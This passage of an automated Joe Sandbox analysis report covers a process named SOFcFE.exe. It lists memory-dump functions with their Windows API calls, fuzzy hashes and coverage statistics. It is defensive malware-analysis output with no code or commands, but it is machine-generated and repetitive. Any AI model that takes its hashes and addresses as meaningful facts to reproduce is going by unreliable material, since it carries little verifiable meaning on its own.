Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4c91c51cd255e170dec9e1be091eeec45af5d97fa1ad27584f85a241813dafad
Instruction ID: 68cc9d2916a2234f9a63e3c755b542bb7d5768379f4560b066e679130e4da2d6
Opcode Fuzzy Hash: 4c91c51cd255e170dec9e1be091eeec45af5d97fa1ad27584f85a241813dafad
Instruction Fuzzy Hash: 95115571C003498FDB24DFAAC8457AEFBF4AB88220F208419D419A7240CA39A941CFA0

Function 0267AFB3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0267B01E

Memory Dump Source

Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5c2701a25a9b22dc7a25d8b977a397fea63d0e0deb48feeb319dab8083ccf357
Instruction ID: 35a1da7d265d637eb32704c0276295f4560d8f391e82eb153d80fa3bb7d80ff0
Opcode Fuzzy Hash: 5c2701a25a9b22dc7a25d8b977a397fea63d0e0deb48feeb319dab8083ccf357
Instruction Fuzzy Hash: C611F0B5C006498FCB20DF9AD444BDEFBF4EB88314F10841AD429A7600D37AA546CFA1

Function 0926D330 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0926D395

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6d69de8e82be390eeac9872c6a4c78c6386f6415310dc8ea1b9e327d3d187202
Instruction ID: 341baba6b40bbdbbb4bf6b878be662a4b566e01c56f8103aeed2f90e6d3f6a12
Opcode Fuzzy Hash: 6d69de8e82be390eeac9872c6a4c78c6386f6415310dc8ea1b9e327d3d187202
Instruction Fuzzy Hash: 3B11E3B58003499FDB10DF9AC845BDEBFF4EB59310F20845AD419A7650C375A584CFA1

Function 0926B5A8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0926D395

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a30f2d4c06100a0f5d0dab3220544cc26d67024274b7cdda76129f11e92a3f4c
Instruction ID: 65ffb0be75c9da4de72b321f29c5863396cdb85fa69a67f0b3134232472e5ee8
Opcode Fuzzy Hash: a30f2d4c06100a0f5d0dab3220544cc26d67024274b7cdda76129f11e92a3f4c
Instruction Fuzzy Hash: EB1133B590034D9FDB20DF8AC845BDEFBF8EB48320F108419E918A7650C375A990CFA1

Function 0267AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0267B01E

Memory Dump Source

Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 38ffb4fdfbec57fc88230659bef638c3cc14ee51a70b438e29b48d75a23bfd2b
Instruction ID: 09d88dc56494cefbfefb2ac596a5cd08b0f6324d601ffa11829708b5e50ad083
Opcode Fuzzy Hash: 38ffb4fdfbec57fc88230659bef638c3cc14ee51a70b438e29b48d75a23bfd2b
Instruction Fuzzy Hash: 9911DFB5C007498FDB24DF9AD944BDEFBF4BB88324F10842AD429A7210D37AA545CFA1

Function 0259D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1450208082.000000000259D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0259D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_259d000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b967a900accc4d044a582bbfb144f9da0a51f4114406f20ee768361f94fc567
Instruction ID: a7d79e5a8fb215706577c1e8c14c70dda00b9a1ed211fd1710f3440251d9f157
Opcode Fuzzy Hash: 2b967a900accc4d044a582bbfb144f9da0a51f4114406f20ee768361f94fc567
Instruction Fuzzy Hash: 3221F172605204DFDF18EF14D9C0B26BF75FB88324F24C569E90A0B256C37AE456CAA2

Function 0259D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1450208082.000000000259D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0259D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_259d000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baebeabe85d751efb91e5524f0c1115287c6818e6e6663b645cdc89088016c10
Instruction ID: b67dbbe7f331f950d7051fb446ff5d14a7d165d4b18a12ddeefb3c01257b1799
Opcode Fuzzy Hash: baebeabe85d751efb91e5524f0c1115287c6818e6e6663b645cdc89088016c10
Instruction Fuzzy Hash: 3621F272605240DFDF15EF14D9C0B26BF75FB88328F24C569E8090B256C336D856CBA6

Function 025AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1450350093.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_25ad000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54cf5b8bbf3148b451bf5a6cd319859e554537b9ea824c09422a2f40744d3187
Instruction ID: b4fb5787602a54ee608691bff0240dd74923796764e4c245c3009544655c5def
Opcode Fuzzy Hash: 54cf5b8bbf3148b451bf5a6cd319859e554537b9ea824c09422a2f40744d3187
Instruction Fuzzy Hash: D6210375605200DFDB14EF10D996B2ABF71FB84314F20C969D84A4B646D336D407CA65

Function 025AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1450350093.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_25ad000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c4f947066bf49edb3df5f6093bfd26563e466d8f3017c05cd91dcf21c53a76a
Instruction ID: 795726461eb8ecbfa82ba785f3b1daccfde42e31376ed9bc9d2bddf108590d6b
Opcode Fuzzy Hash: 4c4f947066bf49edb3df5f6093bfd26563e466d8f3017c05cd91dcf21c53a76a
Instruction Fuzzy Hash: 38212571604200DFDB04EF10D9D1B29BF71FF84314F20C96DD80A4B652C33AD806CA65

Function 025AD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1450350093.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_25ad000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817a01b0ddcbc3d0aceb0b3d8b5f784d6816f72c6f769ad917f55d8d937a3dc1
Instruction ID: a468228718993461c4938c79afb146dbf0c798e313190cc65d4a101d460e4f2d
Opcode Fuzzy Hash: 817a01b0ddcbc3d0aceb0b3d8b5f784d6816f72c6f769ad917f55d8d937a3dc1
Instruction Fuzzy Hash: F62180755093808FCB02DF24D591715BF71FB46214F28C5DAD8898F6A7C33A980ACB62

Function 0259D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1450208082.000000000259D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0259D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_259d000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: a959c568870ebd62584cab2d0910b2b8a2bff28e2864900bc88d69af55730aed
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: 17112676504240CFCF05DF00D5C0B16BF72FB84324F24C2A9D8090B256C33AE456CBA1

Function 0259D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1450208082.000000000259D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0259D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_259d000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: acc1b84c80b9794bb62a2c06bfea0eacff519d31a6123c8bdaa9679064aabe99
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: B411E676504280CFCF15DF14D5C4B16BF72FB84328F24C6A9D8494B656C33AD856CBA1

Function 025AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1450350093.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_25ad000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: c2de44d91bf3fe8db672dca2b09ade3178a003056b11249acd42b269e92bc011
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: 8A117975504280DFCB15DF14D5D4B19BFB2FB84324F24C6A9D8494B6A6C33AD44ACB61

Analysis Process: SOFcFE.exePID: 7664, Parent PID: 7376COMMON

Execution Graph

Execution Coverage:	16.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	15.2%
Total number of Nodes:	33
Total number of Limit Nodes:	4

Executed Functions

Function 06A797B0 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3774848956.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6a70000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc71f94b70209633c447c109aabaf7f33ab05c1ac779cc6d36316a8526e8ca84
Instruction ID: 5d74f8d6f44966fea0ae4e840b5a8ad5b50cf17974e18d33feeebd2198477b0b
Opcode Fuzzy Hash: bc71f94b70209633c447c109aabaf7f33ab05c1ac779cc6d36316a8526e8ca84
Instruction Fuzzy Hash: 55F1E574D00218CFEB54DFA9D884B9EFBB2BF88304F5481AAD448AB355DB31A985CF50

Function 02C3A088 Relevance: .9, Instructions: 890COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1141ce64958e2db8a69b7e45306fb423145a11f2730b37dde5e25b1bc77f6ea
Instruction ID: 156ef327da1bd036aeea6fc0ef4d41bca74eed0e32a65009ad9a45df6140c688
Opcode Fuzzy Hash: d1141ce64958e2db8a69b7e45306fb423145a11f2730b37dde5e25b1bc77f6ea
Instruction Fuzzy Hash: 0B825E71A00209DFCB16CFA8C584AAEBBB2BF88314F158959E445AB365D731ED61CF60

Function 02C369A0 Relevance: .5, Instructions: 510
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60feebd4bd681d52c1252a3f5c87df3517b34b36f3bb9257ce60ebe1d5c694ea
Instruction ID: 148b87cd31a8a1ba69fdc9b76694ea58c0a6371b93c2e9ebe83ecacf31ca39f4
Opcode Fuzzy Hash: 60feebd4bd681d52c1252a3f5c87df3517b34b36f3bb9257ce60ebe1d5c694ea
Instruction Fuzzy Hash: 41127D70A002199FDB15DF69C854BAEBBF6FF88304F208929E406EB355DB359D42CB94

Function 02C37118 Relevance: .4, Instructions: 352
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7e1770056114a1380156de80e3549fa6ca186bb9f3e373afbaaae16f27c2a3
Instruction ID: 9cd153d4f1b1e9b336b341464dfa9ef23901212f45aaa5810f22042effca703f
Opcode Fuzzy Hash: 6e7e1770056114a1380156de80e3549fa6ca186bb9f3e373afbaaae16f27c2a3
Instruction Fuzzy Hash: 5AE128B1A00119DFCB16CFA9C884AADFBB2BF88314F158869E805AB365D731ED55CF50

Function 02C3C147 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc105916a3f64ceda133ae83353186a00b06b8d7efe21a05e7faccf4c789fbb
Instruction ID: 7023ee5c2e2f6b70a88f529f4c90b66b1ba304c6937cd99c9e8bbc2aa6436bc9
Opcode Fuzzy Hash: 1dc105916a3f64ceda133ae83353186a00b06b8d7efe21a05e7faccf4c789fbb
Instruction Fuzzy Hash: 49A1F675E00218DFDB15DFAAD884A9DBBF2BF89300F14846AE409BB365DB319941CF50

Function 02C35362 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e389dd174ac4df8bd84955e834dc12fb53df12d2599e6690bbf78a91c61ebbb
Instruction ID: 740358763760dd2b959e702c45d0f08221bafe85b64a62d5b5144783d6f3ca5e
Opcode Fuzzy Hash: 6e389dd174ac4df8bd84955e834dc12fb53df12d2599e6690bbf78a91c61ebbb
Instruction Fuzzy Hash: 3C91D475E00218DFDB19DFA9D984A9DBBF2FF88300F5484AAD809AB365DB309945CF50

Function 02C3C468 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d0995bc6cb778367906cf26878502e49e4f6a1baa7144cd02ab736e9b050fea
Instruction ID: 94d71aeae62c5147303849b94f63cb32494f14093f00ac75126b21a2b4ae0733
Opcode Fuzzy Hash: 4d0995bc6cb778367906cf26878502e49e4f6a1baa7144cd02ab736e9b050fea
Instruction Fuzzy Hash: 5581A374E00218DFEB15DFAAD984A9DBBF2BF88300F14946AD819BB365DB305941CF50

Function 02C3CA08 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 735c8c7e2c860d15244237b0d5614f3ca5589cec12c02276592faa2381207a29
Instruction ID: d2955c0c58c5d13afdeec2cf07aa4ee9956626d475985801faad347ce480c79b
Opcode Fuzzy Hash: 735c8c7e2c860d15244237b0d5614f3ca5589cec12c02276592faa2381207a29
Instruction Fuzzy Hash: B281A474E00618DFDB15DFAAD984A9DBBF2BF88304F14846AD819BB365DB309941CF50

Function 02C3D278 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a184c8361717e24b2f3bdc31243eaebe00a9f2d0d6246a7c7b08b8975c8f2f90
Instruction ID: 0d44c1ed7a2557cfd9990627f97ce8be3650c9908a3604fd28b3afe04200d7e7
Opcode Fuzzy Hash: a184c8361717e24b2f3bdc31243eaebe00a9f2d0d6246a7c7b08b8975c8f2f90
Instruction Fuzzy Hash: 8481C774E00218CFDB19DFAAD984A9DBBF2BF88310F148469E419AB365DB309941CF51

Function 02C3C738 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82b7ef60873f3ee0239241e476ede0f0099c4d46a1a6c63d54eaf1df7f9e45b2
Instruction ID: 89a0862a58dd294255aa19a19d14fca647b01412535c67dbd2e57a9ed29d865b
Opcode Fuzzy Hash: 82b7ef60873f3ee0239241e476ede0f0099c4d46a1a6c63d54eaf1df7f9e45b2
Instruction Fuzzy Hash: AB819274E00218DFEB15DFAAD984B9DBBF2BF88300F14846AE819AB355DB305A41CF51

Function 02C3CCD8 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 906207956e6df6692b10efff22ad9fd9787504d06ba68993d3c108d3dfa3b9ee
Instruction ID: ab0868a0302518035aadc4cf72895b63ad556696ad23e177ab47c9c7fde07185
Opcode Fuzzy Hash: 906207956e6df6692b10efff22ad9fd9787504d06ba68993d3c108d3dfa3b9ee
Instruction Fuzzy Hash: 4B81A374E00258DFEB14DFAAD984A9DBBF2BF88300F14846AE419BB365DB309941CF50

Function 02C3CFAA Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecbc6bd6cde37dbd225036e73f460305c1f709429385b55845de158581974e36
Instruction ID: 29dfcce03ec6e4f064f6d9473f7306d56063e4a57ef384c8f5404d4f5a8231e0
Opcode Fuzzy Hash: ecbc6bd6cde37dbd225036e73f460305c1f709429385b55845de158581974e36
Instruction Fuzzy Hash: 5D81B374E00218DFEB15DFAAD984A9DBBF2BF88310F14C469E819AB365DB309945CF50

Function 02C3EC18 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3768369ea9499bc810764c13eb7c3de4d65dee1c589afc62333a40899e8e8b02
Instruction ID: 35f1304b182eecee5375f16161c108b3f587cb7ee4317d72035673ca44f009c0
Opcode Fuzzy Hash: 3768369ea9499bc810764c13eb7c3de4d65dee1c589afc62333a40899e8e8b02
Instruction Fuzzy Hash: AD51A574E00308DFEB19DFAAD594A9DBBB2FF89300F248429E815AB364DB315942CF54

Function 02C3EC0A Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c9e7600569bff669a2b5c377c36887d32ec2fadc35289ff9ee54cb183cd396
Instruction ID: 0e3fbc195f9d4f8bd2c8e9840e3deda224411f434e9b284051810c4d447189d2
Opcode Fuzzy Hash: e3c9e7600569bff669a2b5c377c36887d32ec2fadc35289ff9ee54cb183cd396
Instruction Fuzzy Hash: AD51A874E00308DFDB19DFAAD594A9DBBB2FF89300F248429E815AB364DB315942CF14

Function 06A79B94 Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 06A79CD6

Memory Dump Source

Source File: 00000014.00000002.3774848956.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6a70000_SOFcFE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02a505556b381d68266600bf770133acd5350b05cfcee720b20a3437f7e8d04e
Instruction ID: d011bdf58c74f9483937b62ec90cce6549f36e6beb7aa31335fbbd578557ef22
Opcode Fuzzy Hash: 02a505556b381d68266600bf770133acd5350b05cfcee720b20a3437f7e8d04e
Instruction Fuzzy Hash: DB117F74E002198FEB44EBA8D884AAEBBF5FF88315F148166E804E7342D731EC41CB94

Function 02C3E2A8 Relevance: .6, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fc32bc215d2e3762a7ec932441b7b23d3aa243fc6c658fc693f5f1cac7c7ddd
Instruction ID: 92d7c6ed6bda179177759e5939461ba395a6b73b20eeda1fd9074b7cb6334770
Opcode Fuzzy Hash: 5fc32bc215d2e3762a7ec932441b7b23d3aa243fc6c658fc693f5f1cac7c7ddd
Instruction Fuzzy Hash: 0E12BA388A56538FD7402F74F2BC92ABB65FB5F363704AD01E10BC4A45EB7508A98E71

Function 02C30C8F Relevance: .5, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e27926437dd3c1d8ef2c92b38bef4536b9996ba33bc04cbbe55768cdbdd3141
Instruction ID: 736e60209c6d964488ae057d9291c9177ab96ccd324b649e020b96849cf5de28
Opcode Fuzzy Hash: 6e27926437dd3c1d8ef2c92b38bef4536b9996ba33bc04cbbe55768cdbdd3141
Instruction Fuzzy Hash: 55520D79D01219CFDB65EF64E998B9DBBB2FB48301F1085AAD409A7358DB306D85CF80

Function 02C30CA0 Relevance: .5, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fee0b57a9230da7e6e76e7898a751f8eda86b673d17f48f74a9afedc5dc937fc
Instruction ID: a2dfa492cedb2f3aa00dd6e69db812c281ae0d92f8ebeaf7431bbcbd0f5a9a7c
Opcode Fuzzy Hash: fee0b57a9230da7e6e76e7898a751f8eda86b673d17f48f74a9afedc5dc937fc
Instruction Fuzzy Hash: BB520C79D01219CFDB65EF64E998B9DBBB2FB48301F10859AD409A7358DB306E85CF80

Function 02C376F1 Relevance: .5, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10d931dd90c668d1259eff301b99985626117be248674995e4c1978694341241
Instruction ID: 34f759b52cdfb1b646d51e027e9102112e51001240796bb9c30266a908408d90
Opcode Fuzzy Hash: 10d931dd90c668d1259eff301b99985626117be248674995e4c1978694341241
Instruction Fuzzy Hash: 35124970A00609DFDB26CF69D884AAEBBF2FF88318F158959E445AB361D730ED45CB50

Function 02C35F38 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd06e3f6412e45b60f1f6d63c3901426b86a4a31b47c4b6cdc4f5ed06a0d2a3
Instruction ID: 636c93c50adafeab8416db1f4e8182b660583d6ac0319cc639f8f06645fdd2a9
Opcode Fuzzy Hash: 1fd06e3f6412e45b60f1f6d63c3901426b86a4a31b47c4b6cdc4f5ed06a0d2a3
Instruction Fuzzy Hash: F391BC30B04205AFDB169F24C858B7E7BA6BFC8204F14896AE446CB395DB35CD02C7A9

Function 02C36498 Relevance: .2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 233f9b1f12240a814213d8f825a4a257abcbc6a0a96a17694d1540127bd5a12f
Instruction ID: 3f5e47c65f1f4fdc183f5c74cd537933bc08ac6d22e3630382bd2c5a2c88ff70
Opcode Fuzzy Hash: 233f9b1f12240a814213d8f825a4a257abcbc6a0a96a17694d1540127bd5a12f
Instruction Fuzzy Hash: 2D81C131B00505EFCB15DF69C488A6ABBFAFF89258B348969D505E7365CB31EC01CBA4

Function 02C39A10 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d210a39108752de8c559976d181eceee895ccb1ed2769fc10012a2d40d7984fc
Instruction ID: f319275eaee146a9f0975c248d06936257b7d94dba15e393b036707c3962212b
Opcode Fuzzy Hash: d210a39108752de8c559976d181eceee895ccb1ed2769fc10012a2d40d7984fc
Instruction Fuzzy Hash: F2811931A006069FC712CF2CD884AAABBF6FF85324B15CA66D85897355D771FD11CBA0

Function 02C380D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c042584bb1e0687bff33925bae3b58b01b59ecba009cf34e41f878fb0bfd3e89
Instruction ID: ff98616df47a66d731ec61e3e1d8d33e12b4eb90d2d6a95243a774a352238827
Opcode Fuzzy Hash: c042584bb1e0687bff33925bae3b58b01b59ecba009cf34e41f878fb0bfd3e89
